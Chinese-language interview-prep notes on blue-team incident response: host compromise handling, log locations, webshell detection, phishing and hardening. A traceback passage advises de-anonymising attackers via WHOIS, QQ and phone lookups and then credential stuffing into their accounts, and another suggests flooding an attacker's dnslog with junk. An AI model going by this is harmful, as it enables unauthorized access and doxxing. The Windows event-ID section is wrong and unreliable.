2. 排查 0day 流量通过流量探针进行攻击流量排查同时分析下应用日志重点看下异常报错还有登录的地方还有url比较长一看就不正常的
3. 还有就是异常文件如果有异常文件可以先分析后处理然后回溯排查拿不准的话可以取得经理同意后复现进行加固及时向waf写规则## 一台机子失陷了因业务需要不能断网怎么处理1. 关闭ssh、rdp等允许远程连接的协议端口
2. 看下外联有无可疑ip若有对其进行封禁或设置ip白名单只能有所需要的ip才能访问
3. 排查下有无文件遗留通过 webshellkiller、D 盾、河马之类的工具进行查杀
4. 查看下告警根据告警事件点审计各类日志和流量看看怎么打进来的进行加固## 内网机子失陷怎么做1. 进行隔离、做好边界控制
2. 查看进程、若存在可疑进程通过pid找到文件路径保留现场经同意后干掉可疑进程和可疑文件
3. 通过可疑文件的创建时间定位到相应的应用日志位置看看是怎么进来的进行加固
4. 查看下定时任务有无可疑的
5. 看看有没有可疑账号存在
6. 确认下有没有文件遗留
7. 使用后门查杀工具进行排查## **linux的日志存放在哪个目录下**Linux 的日志文件通常存储在 /var/log 目录下这是一个系统和应用程序日志文件的默认存储位置。不同的日志类型存储在不同的子目录下以下是一些常见的子目录和对应的日志类型 /var/log/messages系统日志包含了操作系统的各种信息、警告和错误等。 /var/log/auth.log安全认证日志记录系统的用户登录、认证、授权等信息。 /var/log/syslog系统日志的一个备份文件。 /var/log/kern.log内核日志记录内核级别的信息例如硬件故障等。 /var/log/dmesg内核环缓存包含启动信息、硬件检测和驱动程序的信息等。 /var/log/cron定时任务日志记录定时任务执行的情况。 /var/log/maillog邮件日志包含了邮件服务器的日志信息。## win登录日志怎么看判断是否登录成功事件查看器里面有windows日志文件在下面安全性就可以看到很多日志登录成功的话就会有对应的事件id登录失败就会有不同的事件id## windows事件ID一般是多少Windows事件ID是用来标识不同事件类型的数字代码。不同类型的事件有不同的事件ID通常情况下Windows系统的事件ID是在100到999之间的整数。例如系统启动时的事件ID为100关机时的事件ID为200应用程序错误的事件ID通常在1000以上。需要注意的是不同版本的Windows操作系统可能会有不同的事件ID编号范围和对应的事件类型因此在查看和分析Windows日志时需要根据具体情况进行理解和处理。## **Linux后门排查哪些东西**查看用户信息相关的文件看看有没有多余的账户、特权账户、隐藏账户、可以远程登录的账户、sudo权限的账户检查一下网络连接、异常进程检查定时任务、开机启动、服务、端口、可疑的文件检查系统日志## Linux怎么查看程序调用了哪些文件lsof -c 指定的程序查看多个程序的话直接在后面加就可以## **判断自己是否给getshell就是给用D盾查杀**webshell
查web日志分析攻击流量
扫webshell
排查网站目录查看最近更改的文件
shell
查看未知端口未知进程
排查恶意流量锁定感染进程
有安全设备就看安全设备 内网报警处理方式可能会问的会不一样不会直接问
首先就要是地位到具体的那一台机器既然报警那就说明知道了具体的漏洞类型加相应的补丁打上
以linux为主一般都会问linux的查看/var/log/secure系统日志查看登录失败的记录还有Linux历史命令--gt;home目录的bash_histor查看执行过的命令。
在利用webshell或者是shell查杀工具查杀查看tmp目录下是非有带有免杀的木马。彻底清除。再到全流量分析的机子上看是非有经过其他的机器。
拿到攻击ip之后到线上的一些网站查看主机类型比如360或者微步上查看是非是傀儡机vps跳板或者是国内个人云主机。
如果是个人云主机就可以通过whois查看是非有最近绑定的域名或者绑定者的邮箱。
知道邮箱之后就可以反查询出qq号说多少再利用社工查询到手机号
到一个知名的网站上查询这个手机号有没有注册过什么网站可以去这些网站通过撞库的方法登入这样就可以拿到这个攻击者的身份证学校地址这些了。
思路是应急响应;加固;溯源 被攻击后日志文件或者木马文件被删除排查lsof恢复被删除的文件然后查日志查服务查进程查看是否有新增的账号
安全设备进行报警如何看是否是外界的攻击即是否是误报或是内部人员进行的操作查看报警日志对报警的数据进行分析看是不是内部人员的操作还是真实的攻击
流量分析是否是误报分析流量数据包可以用wireshark分析流量是不是正常的业务操作 服务中了webshell 怎样从日志找webshell位置被拿shell后怎么应急怎样快速定位shell
从日志流量文件开始先定位位置查看敏感目录tmp usr/sbin etc/ssh 对新创建文件修改文件等进行查看找特殊权限文件比如777 。
流量的话从ua和playload去分析。比如菜刀连jsp木马第一个参数是a-q这个是不会变的第二个是编码第三个是playload。日志的话从找到的shell时间点去关联分析可以还原攻击手法
快速定位就是看进程和内存看占用时间长和占用率高的## 挂马怎么排查啊xss webshell确认是否被攻击可以通过检查网站页面源代码、访问日志、异常流量等方式确定网站是否被攻击。
分析攻击方式分析黑客攻击方式了解攻击者的手段比如是否是通过SQL注入、文件上传漏洞等方式进行攻击。
定位被攻击的文件查找被攻击的文件一般包括Web服务器的相关文件、网站源代码、数据库等可以通过检查文件的时间戳、比对文件的MD5值等方式进行确认。
清除恶意代码一旦确定被攻击的文件需要清除恶意代码可以手动清除或者使用工具进行清除。同时需要注意备份重要数据以免误操作导致数据丢失。
安全加固排查完恶意代码后需要对系统进行加固避免类似攻击再次发生可以使用一些安全工具或者参考安全加固手册进行操作。
验证清除结果最后需要对系统进行全面验证确保清除工作的完整性和有效性避免留下后门或者未发现的漏洞等问题。## **webshell检测思路**通过匹配特征码特征值危险函数来查找webshell webshell如果传到服务器了在执行函数时这些对于系统调用、系统配置、数据库、文件的操作动作都是可以作为判断依据Linux下就是nobody用户起了bash,Windows下就是IIS User启动 cmd这些都是动态特征。再者如果黑客反向连接的话那很更容易检测了Agent 和IDS都可以抓现行Webshell总有一个 HTTP 请求如果我在网络层监控 HTTP并且检测到有人访问了一个从没访问过的文件而且返回了 200则很容易定位到webshell。使用webshell一般不会在系统日志中留下记录但是会在网站的 web日志中留下webshell页面的访问数据和数据提交记录## **网页被挂马了可能有哪些原因**服务器已经被拿下了、通过漏洞修改了前端文件、存储型XSS、可能被上传了木马病毒## 网站被挂马如何应急1.取证登录服务器备份检查服务器敏感目录查毒搜索后门文件-注意文件的时间 用户后缀等属性调取日志系统中间件日志WAF日志等
2.处理恢复备份快照回滚最近一次确定入侵方法漏洞检测并进行修复
3.溯源查入侵IP入侵手法网路攻击事件的确定等
4.记录归档--------预防-事件检测-抑制-根除-恢复-跟踪-记录通用漏洞的应对等其他 安全应急事件## 分析日志用什么工具啊使用日志分析工具如LogForensicsGraylogNagiosELK Stack等等## **webshell杀了以后还有外连流量怎么办应急**如果杀掉Webshell后仍然有外连流量可能存在以下情况
Webshell仍在运行在杀掉Webshell后有可能仍然有外连流量可能是因为Webshell并没有被完全杀死。可以再次检查系统进程确认Webshell是否被杀死。
恶意程序已经感染其他系统恶意程序可能已经感染了其他系统通过其中的一个系统继续进行攻击。可以在网络边界设备上进行流量监测检查是否有大量的外连流量确定是否有其他系统被感染。
攻击者已经在系统中植入了后门攻击者可能已经在系统中植入了后门程序通过后门程序继续进行攻击。可以在系统中查找可疑的后门程序或者系统服务同时在网络边界设备上进行流量监测检查是否有异常的网络流量。
紧急应对的方法可以包括以下步骤
切断网络连接如果发现外连流量很大可以考虑切断网络连接以防止恶意程序继续进行攻击。
查杀恶意程序可以使用杀毒软件或者安全工具对系统进行全面扫描查杀恶意程序并对系统进行修复。
清除后门和木马对于已经植入的后门和木马程序可以使用安全工具进行清除或者通过手动查找和删除的方式进行清除。
加强安全防护对于被攻击的系统需要加强安全防护包括更新补丁、强化口令、关闭不必要的服务等以防止再次受到攻击。
在利用webshell或者是shell查杀工具查杀查看tmp目录下是非有带有免杀的木马。彻底清除。再到全流量分析的机子上看是非有经过其他的机器。
拿到攻击ip之后到线上的一些网站查看主机类型比如360或者微步上查看是非是傀儡机vps跳板或者是国内个人云主机。
服务中了webshell 怎样从日志找webshell位置被拿shell后怎么应急怎样快速定位shell
从日志流量文件开始先定位位置查看敏感目录tmp usr/sbin etc/ssh 对新创建文件修改文件等进行查看找特殊权限文件比如777 。
流量的话从ua和playload去分析。比如菜刀连jsp木马第一个参数是a-q这个是不会变的第二个是编码第三个是playload。日志的话从找到的shell时间点去关联分析可以还原攻击手法
快速定位就是看进程和内存看占用时间长和占用率高的## 入侵排查的流程1、检查系统账号安全查看服务器是否有弱口令远程管理端口
是否公开查看服务器是否有可疑账号cmd输入lusrmgr.msc命令查看服务器是否存在隐藏账号、克隆账号结合日志查看管理员登录时间用户名是否存在异常
2、检查异常端口、进程检查端口连接情况是否有远程连接、可疑连接a、netstat -ano查看目前的网络连接
定位可疑的ESTABLISHEDb、根据netstat 定位出的pid再通过tasklist命令进行进程定位 tasklist | findstr “PID”
3、检查启动项、计划任务、服务winr输入msconfig查看异常启动项winr输入regedit打开注册表查看开机启动项
4、检查系统相关信息winr输入systeminfo查看系统信息
5、日志分析winr输入eventvwr.msc,打开事件查看器导出应用程序日志安全日志系统日志利用log parser分析## **如何判断是钓鱼邮件**- 以公司某部门的名义如安全部、综合部使用正式的语气内容涉及到账号和密码等敏感信息可能带有链接地址或附件制造紧张氛围比如24小时内今日下班前完整账号密码修改。
- 看发件人 设备上也会报IP 上微步查一下IP是不是恶意IP 邮件的发件人和内容是不是正常的业务往来
- 附件放到沙箱里 看看是否有问题
- 有的邮件会提示你邮件由另一个邮箱代发或者邮箱地址不是本公司的再或者邮箱地址是qq或者163等个人邮箱的那就更没跑了## 怎么防范邮件钓鱼定期组织员工安全讲座提供员工的安全意识企业内邮件系统使用可信赖的邮件服务员工企业邮箱不得使用弱口令等如果被感染了也要让大家清楚该做什么例如直接拔网线等操作## **针对dnslog的反制**对于常见的dnslog平台直接屏蔽如果是自己搭建的dnslog平台批量的去ping恶意制造各种垃圾dnslog数据让他无法获取到有效的信息具体可以写一个脚本进行批量探测存活httplog也一样使用爬虫批量进行request请求## **网络基线加固思路**先看防护软件有没有升级先升级最新版本进行全盘扫毒查看高危端口高危服务查看主机有没有被爆过漏洞的软件
windows重命名administrator账户、禁用GUEST账户、清理系统无效账户、配置密码策略账户锁定策略 Linux删除无用账号、检查特殊账号、添加口令策略、禁止root直接登录、设置隐藏文件属性、关闭不必要服务、更改ssh端口号防爆破## **怎么修改TTL值**windows下是修改Default注册表文件linux是修改etc/sysctl.conf文件## 一台主机在内网进行横向攻击你应该怎么做确定攻击来源是不是员工内部误操作比如询问运维是否有自动化轮训脚本。如果没有确定是攻击结合时间点根据设备信息看一下安全事件进程流量找到问题主机开始应急响应流程准备检测遏制根除恢复跟踪具体的操作要交给现场运维去处理。## SQL注入的预防预编译
PDO
正则表达式过滤## 如何查看当前进程Ps -ef 或 ps -aux## 临时目录是哪个文件夹/tmp /var/tmp## 用户列表是在哪个目录下(如何查看Linux有哪些用户)/etc/passwd## 和甲方上报 IP 地址你要上报哪些地址呢上报攻击 ip 的地址先判断是内网 ip 还是公网 ip如果是内网ip查看是否是业务白名单行为若不是再上报进行判断。若是公网 ip查看是否在白名单内若不是查看是否是扫描器 ip若是扫描器 ip扫描对业务或者对研判产生了影响则可以上报若不是且判断出是真实攻击 ip 也进行上报。
